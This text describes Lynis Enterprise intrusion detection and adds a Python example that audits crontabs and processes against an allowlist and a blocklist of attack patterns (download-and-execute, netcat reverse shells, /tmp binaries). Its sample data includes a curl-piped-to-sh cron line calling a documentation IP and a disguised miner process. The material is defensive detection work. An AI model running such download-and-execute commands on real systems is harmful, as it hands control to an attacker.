Even when you take the right security measures, a single weak spot is enough for an intruder to break in. When that happens, a system may be compromised or fully taken over by an attacker, and companies often don't notice for weeks or even months. This is why intrusion detection is an important part of your security plan.
Detection is not a replacement for prevention or damage control. It builds on top of them and measures their effectiveness: a warning, or an actual intrusion, is a valuable lesson about how well your other security controls are working.
Unfortunately, most companies spend most of their security budget on prevention, leaving detection weak. Lynis Enterprise fills this gap by auditing your existing defenses. In some cases Lynis can discover an intrusion by comparing expected results with the values actually found on the system.
Intrusions can be detected in different ways, for example by placing digital trip wires that alert an administrator when a wire is "tripped". Lynis helps you decide what to use as a trip wire and where to place it, from setting up an audit configuration to functionality like honeypots.
The system is checked for suspicious events and scripts, such as those triggered via cron or other scheduling mechanisms. To find traces of malware, running processes are analyzed together with the files stored on disk. Both whitelists (what is expected on the system) and blacklists (what is known to be bad) are used to find signs of a successful intrusion. This functionality is provided by a separate Lynis plugin, combined with modular intelligence on the central node. By comparing systems with each other and combining the detection methods above, issues can be found that would otherwise have remained hidden.
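To make the whitelist/blacklist idea concrete, here is an added example of what such a check can look like. It is not Lynis or Lynis Enterprise code and does not reflect the plugin's internals: it scans a constructed user crontab and a constructed `ps -eo pid,user,comm,args` listing against a small allowlist of expected commands and a small blocklist of known-bad patterns, and then compares the crontabs of three hosts that should be configured identically to spot the one that differs. The blocklist patterns, the allowlist, the hostnames and the sample data are all assumptions made up for the example.

```python
"""Hypothetical cron and process checks against an allowlist and a blocklist,
plus an outlier comparison across hosts. Added example, not Lynis code."""
import re
from collections import Counter

# Constructed blocklist of patterns typical of persistence and post-exploitation.
# Not exhaustive; a real deployment would maintain this list centrally.
BLOCKLIST_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download-and-execute"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e (reverse shell)"),
    (re.compile(r"(^|\s|=)/(tmp|var/tmp|dev/shm)/\S+"), "executable in world-writable dir"),
]


def matches_blocklist(command):
    """Return the label of every blocklist pattern found in command."""
    return [label for pattern, label in BLOCKLIST_PATTERNS if pattern.search(command)]


def parse_crontab(text):
    """Yield (schedule, command) for each active entry of a user crontab.
    Comments, blank lines and VAR=value lines are skipped. Assumes the user
    crontab format (no user field as in /etc/crontab)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        nfields = 1 if line.startswith("@") else 5  # @reboot etc. vs. m h dom mon dow
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue  # schedule without a command; cron would reject it anyway
        yield " ".join(parts[:nfields]), parts[nfields]


def audit_cron(text, allowlist):
    """Findings as (severity, command, reason). allowlist: exact commands expected here."""
    findings = []
    for _schedule, command in parse_crontab(text):
        hits = matches_blocklist(command)
        if hits:
            findings.append(("high", command, "blocklist: " + ", ".join(hits)))
        elif command not in allowlist:
            findings.append(("medium", command, "not in allowlist"))
    return findings


def audit_processes(ps_text):
    """ps_text: output of `ps -eo pid,user,comm,args` including its header line.
    Flags blocklist matches and, as a heuristic, processes whose comm (the kernel's
    15-char process name) does not match the executable named in argv[0]."""
    findings = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, user, comm, args = parts
        if args.startswith("["):
            continue  # kernel thread, no userland executable to check
        hits = matches_blocklist(args)
        if hits:
            findings.append(("high", f"pid {pid} {user}: {args}", "blocklist: " + ", ".join(hits)))
        base = args.split()[0].rsplit("/", 1)[-1]
        # nginx rewrites argv to "nginx: worker process"; startswith copes with that and with truncation.
        if not (base.startswith(comm) or comm.startswith(base)):
            findings.append(("medium", f"pid {pid} {user}: {args}",
                             f"comm '{comm}' does not match executable '{base}' (possible masquerading)"))
    return findings


def compare_hosts(host_crontabs):
    """host_crontabs: {hostname: crontab text} for hosts that should be configured alike.
    Return {hostname: [commands present on that host only]} for hosts that have such outliers."""
    per_host = {h: {cmd for _, cmd in parse_crontab(t)} for h, t in host_crontabs.items()}
    seen_on = Counter(cmd for cmds in per_host.values() for cmd in cmds)
    outliers = {h: sorted(c for c in cmds if seen_on[c] == 1) for h, cmds in per_host.items()}
    return {h: cmds for h, cmds in outliers.items() if cmds}


# Constructed sample data (hostnames, commands and addresses are made up).
SAMPLE_CRONTAB = """\
# crontab of host web-01
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/php /var/www/app/artisan schedule:run
30 2 * * * /usr/bin/find /var/log -mtime +30 -delete
@reboot /usr/bin/python3 /opt/monitor/agent.py
*/10 * * * * curl -s http://198.51.100.7/u.sh | sh
0 * * * * /tmp/.X11-lock/sync
"""
BASELINE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/php /var/www/app/artisan schedule:run
@reboot /usr/bin/python3 /opt/monitor/agent.py
"""
EXPECTED_CRON = {cmd for _, cmd in parse_crontab(BASELINE_CRONTAB)}
FLEET_CRONTABS = {"web-01": SAMPLE_CRONTAB, "web-02": BASELINE_CRONTAB, "web-03": BASELINE_CRONTAB}
SAMPLE_PS = """\
PID USER COMM ARGS
   1 root systemd /lib/systemd/systemd --system
 412 root sshd /usr/sbin/sshd -D
 901 www-data nginx nginx: worker process
2207 nobody kthreadd /dev/shm/.x/kthreadd -o pool.example:3333
2350 root bash ./.cache/miner --config /etc/.cfg
"""

if __name__ == "__main__":
    for finding in audit_cron(SAMPLE_CRONTAB, EXPECTED_CRON) + audit_processes(SAMPLE_PS):
        print("%-6s %-60s %s" % finding)
    print("cron outliers across fleet:", compare_hosts(FLEET_CRONTABS))
```

The split into "not in allowlist" (medium) and "matches blocklist" (high) mirrors the two lists mentioned above: the allowlist catches anything unexpected on this particular host, while the blocklist catches known-bad constructions regardless of where they appear. The cross-host comparison needs no list at all; it only relies on the hosts being meant to look the same, which is exactly the kind of signal a central node can extract that a single host cannot.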